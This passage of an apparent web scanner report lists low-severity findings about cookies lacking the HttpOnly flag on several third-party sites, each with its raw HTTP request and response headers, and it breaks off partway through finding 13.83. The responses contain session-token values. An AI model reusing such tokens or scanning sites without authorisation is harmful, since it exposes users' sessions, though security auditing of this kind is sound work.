13.68. http://www.manta.com/c/mm49ryk/a-b-c-development-company-inc/x22  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.manta.com
Path:   /c/mm49ryk/a-b-c-development-company-inc/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c/mm49ryk/a-b-c-development-company-inc/x22 HTTP/1.1
Host: www.manta.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 03 Feb 2011 20:28:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-UA-Compatible: IE=EmulateIE8
Vary: Accept-Encoding
Set-Cookie: tcc=one; path=/
Set-Cookie: abtest_v=version&7&site_wide&claimbutton.control; path=/
Set-Cookie: member_session=UmFuZG9tSVZDXysA%5BS%5DCWsGpZJaj0sDqAt3Qj8AAoQFPbOBf7rrCY6lYGPtsEyTlueYzU4Ng64mj5DmsgbfcWNKrZGp6UV3Ll5u5Muh5b8JEtFGe%5BP%5DaEKWvw65AHkGWteILjBVuFz1jjWqjy7LZBTvEvbx5XbZZF03hS7b9DVF6ff%5BS%5DlZoIt%5BS%5Drr3OPqRmO5DeRFflwRyOUZWc5e4K62A7xN6lkweT2Glj9fUIgXkFAVckBCEgTy7H%5BP%5DluqEDQwHIte54Cei0DtflweKRv6pQGPHbAKA%5BE%5D%5BE%5D; domain=.manta.com; path=/; expires=Sat, 05-Mar-2011 20:28:16 GMT
Set-Cookie: refer_id=0000; domain=.manta.com; path=/
Set-Cookie: refer_id_persistent=0000; domain=.manta.com; path=/; expires=Sat, 02-Feb-2013 20:28:16 GMT
Set-Cookie: cust_id=1296764896.830343-519; domain=.manta.com; path=/; expires=Sat, 02-Feb-2013 20:28:16 GMT
Via: 1.0 www.manta.com
Content-Length: 52215
X-Varnish: 1847049511
Via: 1.1 varnish
X-Served-By: ecnext43
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>A B C Development
...[SNIP]...

13.69. http://www.manta.com/c/mm8136k/abc-development-inc/x22  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.manta.com
Path:   /c/mm8136k/abc-development-inc/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c/mm8136k/abc-development-inc/x22 HTTP/1.1
Host: www.manta.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 03 Feb 2011 20:28:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-UA-Compatible: IE=EmulateIE8
Vary: Accept-Encoding
Set-Cookie: tcc=one; path=/
Set-Cookie: abtest_v=version&7&site_wide&adsenseurl.i; path=/
Set-Cookie: member_session=UmFuZG9tSVal7bOT1aWDpS%5BS%5DYHa5elnas1i8FyBu96eHtVxkOzSTAkYqzjbSyN6kyrcEkolEXnIov%5BP%5DNQYJYwp%5BS%5DMR6GmN4JVJGCLWShxUnyRxM1JKLnGsJd%5BP%5DpEQmd2FxR9dBmv0oSQZzlWRLhK63xHsXj2od2mdXI9abrzBxwNryHqU4tFdM5CCpZcqKp53DjBiaE0oTZl76SyA%5BP%5DVWmV%5BP%5Dl6bCbl6JiVFizfhvyNBHxuZJB7Ei7%5BP%5DhAk2cupNjp84JqLXZhVliop9Z5T9YZqAvHxiw%5BE%5D%5BE%5D; domain=.manta.com; path=/; expires=Sat, 05-Mar-2011 20:28:14 GMT
Set-Cookie: refer_id=0000; domain=.manta.com; path=/
Set-Cookie: refer_id_persistent=0000; domain=.manta.com; path=/; expires=Sat, 02-Feb-2013 20:28:14 GMT
Set-Cookie: cust_id=1296764894.813410-573; domain=.manta.com; path=/; expires=Sat, 02-Feb-2013 20:28:14 GMT
Via: 1.0 www.manta.com
Content-Length: 52971
X-Varnish: 1811565262
Via: 1.1 varnish
X-Served-By: ecnext42
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>Abc Development In
...[SNIP]...

13.70. http://www.myspace.com/Modules/PostTo/Pages/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.myspace.com
Path:   /Modules/PostTo/Pages/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Modules/PostTo/Pages/ HTTP/1.1
Host: www.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fu%3dhttp%253a%252f%252fwww.myspace.com
Server: Microsoft-IIS/7.5
X-Server: a75443ca96a96accee61950d37c435b044c975c23a7cdb7c
Set-Cookie: MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634323385473346510&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Thu, 10-Feb-2011 22:02:27 GMT; path=/
Set-Cookie: SessionDDF2=y8IXJD/nhFg8Hw3in+CePVubrzbp787no8iQd5WyjJmDU8u2Oci0NbxppyV+nx3McnZwURY4gt2l9khMgq/WlQ==; domain=.myspace.com; expires=Mon, 03-Feb-2031 22:02:27 GMT; path=/
X-AspNet-Version: 4.0.30319
X-PoweredBy: Pimple Faced Geeks
Date: Thu, 03 Feb 2011 22:02:27 GMT
Content-Length: 249
X-Vertical: integrationframework

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fu%3dhttp%253a%252f%252f
...[SNIP]...

13.71. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:21:04 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=6511c3d78eq0k3q224uiic1f03; expires=Sat, 26-Feb-2011 22:54:24 GMT; path=/; domain=.opensource.org
Last-Modified: Thu, 03 Feb 2011 19:16:24 GMT
ETag: "61d277c2c3aa0a9af5e36cf0f001eba2"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

13.72. http://www.overstock.com/productxml/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /productxml/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /productxml/?QuickList=1&ProductURL=Y&ShortName=Y&keywords=12370379&ThumbnailURL=Y HTTP/1.1
Host: www.overstock.com
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1787227/3-inBannerVideo2011_ViPrPf_New.swf?clickTag=http%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3aa3%2F3%2F0%2F%252a%2Ff%253B234670317%253B0-0%253B0%253B58524542%253B4307-300%2F250%253B40113270%2F40131057%2F2%253Bu%253D%252Clb-1482036_1296770433%252C11d765b6a10b1b3%252Cnone%252Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%253B%257Efdr%253D234572024%253B0-0%253B0%253B32934908%253B4307-300%2F250%253B40173662%2F40191449%2F1%253Bu%253D%252Clb-1482036_1296770433%252C11d765b6a10b1b3%252Cnone%252Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%253B%257Esscs%253D%253f&xmlFile=InBannerVideo_ViPrPf_LongboardVA_ronQ1.xml&taxonomyId=2&taxonomyType=sto&productCID=654321&keywords=&skus=12370379|12958970|11254000|12370390|10927901|11915556|13002490|10738953|12970899|12532546|12130097|12753446|11551645|066987|11144650|10355113|13197342|12941235|12370383|12978335|12453900
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:38 GMT
Server: Apache
Set-Cookie: SSLB=B; path=/; domain=www.overstock.com; expires=Fri, 04-Feb-2011 06:00:38 GMT
Expires: Thu, 03 Feb 2011 22:00:38 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110203; Domain=.overstock.com; Expires=Fri, 03-Feb-2012 22:00:38 GMT; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1296770438500|csbshow^0; Domain=.overstock.com; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1296770438501; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; Domain=.overstock.com; Expires=Fri, 03-Feb-2012 22:00:38 GMT; Path=/
Set-Cookie: mxcsurftype=2; Domain=.overstock.com; Path=/
Set-Cookie: clubogiftcards=clubogctotal^0.00; Domain=.overstock.com; Path=/
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/xml;charset=ISO-8859-1
Content-Length: 982

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<OSTKXML xsi:schemaLocation="http://www.overstock.com/productxml/o1/ProductXmlPage.xsd" xmlns="http://www.overstock.com/productxml/o1" xmlns:xsi
...[SNIP]...

13.73. http://www.qlipso.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.qlipso.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.qlipso.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ASPSESSIONIDASSQDSRS=GEHACPFBKDFJCIHPINDDAHOE; path=/
Cache-Control: private
Content-Length: 6395
Date: Thu, 03 Feb 2011 22:03:01 GMT
Connection: close
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   <title>Qlipso
...[SNIP]...

13.74. http://www.quantcast.com/p-aasG6JkxVvmNA  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.quantcast.com
Path:   /p-aasG6JkxVvmNA

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /p-aasG6JkxVvmNA HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Thu, 03 Feb 2011 22:03:02 GMT
Expires: Wed, 02 Feb 2011 10:03:02 GMT
Cache-control: private, max-age=0
Set-Cookie: qcVisitor=1|69|1296770582348|0|NOTSET; Expires=Sat, 26-Jan-2041 22:03:02 GMT; Path=/
Set-Cookie: JSESSIONID=64B221D97727744347E466E5663A8A8D; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/
...[SNIP]...

13.75. http://www.supermedia.com/js/remember.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.supermedia.com
Path:   /js/remember.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /js/remember.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.supermedia.com

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:10:03 GMT
Set-Cookie: JSESSIONID=0A66AEF1E4C5D7DEE588B7FA61632AF2.app2-a1; Path=/
Set-Cookie: trafficSource=default; Expires=Sat, 05-Mar-2011 19:10:01 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 19:10:01 GMT; Path=/
ETag: W/"3297-1295648758000"
Last-Modified: Fri, 21 Jan 2011 22:25:58 GMT
Content-Type: text/javascript
ntCoent-Length: 3297
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 3297

function getCookie()
{
   
   var co = isCookie();
   if(co!=null && co.length>0){
       //alert(co);
       document.getElementById("uname").value = co;;
       document.getElementById("_acegi_security_remember
...[SNIP]...

13.76. http://www.supermedia.com/spportal/js/cookies.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.supermedia.com
Path:   /spportal/js/cookies.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /spportal/js/cookies.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.supermedia.com

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:10:01 GMT
Set-Cookie: JSESSIONID=8EEFDEEBB6427D38FB2DF2DE03B60FEE.app8-a1; Path=/
Set-Cookie: trafficSource=default; Expires=Sat, 05-Mar-2011 19:09:59 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 19:09:59 GMT; Path=/
ETag: W/"1565-1295648758000"
Last-Modified: Fri, 21 Jan 2011 22:25:58 GMT
Content-Type: text/javascript
ntCoent-Length: 1565
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1565

function getCookieVal (offset) {
var endstr = document.cookie.indexOf (";", offset);
   if (endstr == -1)
   endstr = document.cookie.length;
   return unescape(document.cook
...[SNIP]...

13.77. http://www.supermedia.com/spportal/js/header.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.supermedia.com
Path:   /spportal/js/header.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /spportal/js/header.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.supermedia.com

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:10:05 GMT
Set-Cookie: JSESSIONID=5EEC4BE01C3F00B54D82BAEAE0566D56.app5-a1; Path=/
Set-Cookie: trafficSource=default; Expires=Sat, 05-Mar-2011 19:10:00 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 19:10:00 GMT; Path=/
ETag: W/"26226-1295648758000"
Last-Modified: Fri, 21 Jan 2011 22:25:58 GMT
Content-Type: text/javascript
Cteonnt-Length: 26226
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 26226


var authWindow = null;
function verisignWindow(){

   if(typeof(authWindow) != "undefined" && authWindow &&!authWindow.closed)
   {
       authWindow.location.href = "https://seal.verisign.com/splash?fo
...[SNIP]...

13.78. http://www.supermedia.com/spportal/js/jquery/blockui.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.supermedia.com
Path:   /spportal/js/jquery/blockui.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /spportal/js/jquery/blockui.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.supermedia.com

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:10:04 GMT
Set-Cookie: JSESSIONID=E55111E9FB992E48D15913C486AEB627.app9-a1; Path=/
Set-Cookie: trafficSource=default; Expires=Sat, 05-Mar-2011 19:09:59 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 19:09:59 GMT; Path=/
ETag: W/"18028-1295648736000"
Last-Modified: Fri, 21 Jan 2011 22:25:36 GMT
Content-Type: text/javascript
Cteonnt-Length: 18028
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 18028

/*
* jQuery blockUI plugin
* Version 1.33 (09/14/2007)
* @requires jQuery v1.1.1
*
* $Id: blockui.js,v 1.12 2009/07/21 15:42:34 v779201 Exp $
*
* Examples at: http://malsup.com/jquery/b
...[SNIP]...

13.79. http://www.supermedia.com/spportal/js/jquery/jquery-1.3.2.min.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.supermedia.com
Path:   /spportal/js/jquery/jquery-1.3.2.min.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /spportal/js/jquery/jquery-1.3.2.min.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.supermedia.com

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:10:00 GMT
Set-Cookie: JSESSIONID=420F5E5AA7455FD20FB47D4B2EE9EB28.app2-a1; Path=/
Set-Cookie: trafficSource=default; Expires=Sat, 05-Mar-2011 19:09:58 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 19:09:58 GMT; Path=/
ETag: W/"57254-1295648738000"
Last-Modified: Fri, 21 Jan 2011 22:25:38 GMT
Content-Type: text/javascript
Cteonnt-Length: 57254
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 57254

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...

13.80. http://www.supermedia.com/spportal/js/mbox.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.supermedia.com
Path:   /spportal/js/mbox.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /spportal/js/mbox.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.supermedia.com

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:10:06 GMT
Set-Cookie: JSESSIONID=40F5310672C9D54E38837847FAA1826F.app6-a1; Path=/
Set-Cookie: trafficSource=default; Expires=Sat, 05-Mar-2011 19:10:01 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 19:10:01 GMT; Path=/
ETag: W/"21520-1295648750000"
Last-Modified: Fri, 21 Jan 2011 22:25:50 GMT
Content-Type: text/javascript
Cteonnt-Length: 21520
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 21520

var mboxCopyright = "Copyright 1996-2009. Adobe Systems Incorporated. All rights reserved";mboxUrlBuilder = function(a, b) { this.a = a; this.b = b; this.c = new Array(); this.d = function(e) { return
...[SNIP]...

13.81. http://www.supermedia.com/spportal/js/remember.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.supermedia.com
Path:   /spportal/js/remember.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /spportal/js/remember.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.supermedia.com

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:10:06 GMT
Set-Cookie: JSESSIONID=55A9F12C544ECD1C02A86F6BEB5EE467.app5-a1; Path=/
Set-Cookie: trafficSource=default; Expires=Sat, 05-Mar-2011 19:10:01 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 19:10:01 GMT; Path=/
ETag: W/"3297-1295648758000"
Last-Modified: Fri, 21 Jan 2011 22:25:58 GMT
Content-Type: text/javascript
ntCoent-Length: 3297
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 3297

function getCookie()
{
   
   var co = isCookie();
   if(co!=null && co.length>0){
       //alert(co);
       document.getElementById("uname").value = co;;
       document.getElementById("_acegi_security_remember
...[SNIP]...

13.82. http://www.supermedia.com/spportal/js/s_code.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.supermedia.com
Path:   /spportal/js/s_code.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /spportal/js/s_code.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.supermedia.com

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:10:06 GMT
Set-Cookie: JSESSIONID=7293147F6DD833EEF8CE36B7A24517EC.app3-a1; Path=/
Set-Cookie: trafficSource=default; Expires=Sat, 05-Mar-2011 19:10:00 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 19:10:00 GMT; Path=/
ETag: W/"26266-1295648758000"
Last-Modified: Fri, 21 Jan 2011 22:25:58 GMT
Content-Type: text/javascript
Cteonnt-Length: 26266
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 26266

/* SiteCatalyst code version: H.14.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...

13.83. http://www.supermedia.com/spportal/js/supermedia/homepage.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.supermedia.com
Path:   /spportal/js/supermedia/homepage.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /spportal/js/supermedia/homepage.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.supermedia.com

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:10:06 GMT
Set-Cookie: JSESSIONID=DEC6CC0D302096EC4036A0EEE0509403.app4-a1; Path=/
Set-Cookie: trafficSource=default; Expires=Sat, 05-Mar-2011 19:10:00 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 19:10:00 GMT; Path=/
ETag: W/"3501-1295648750000"
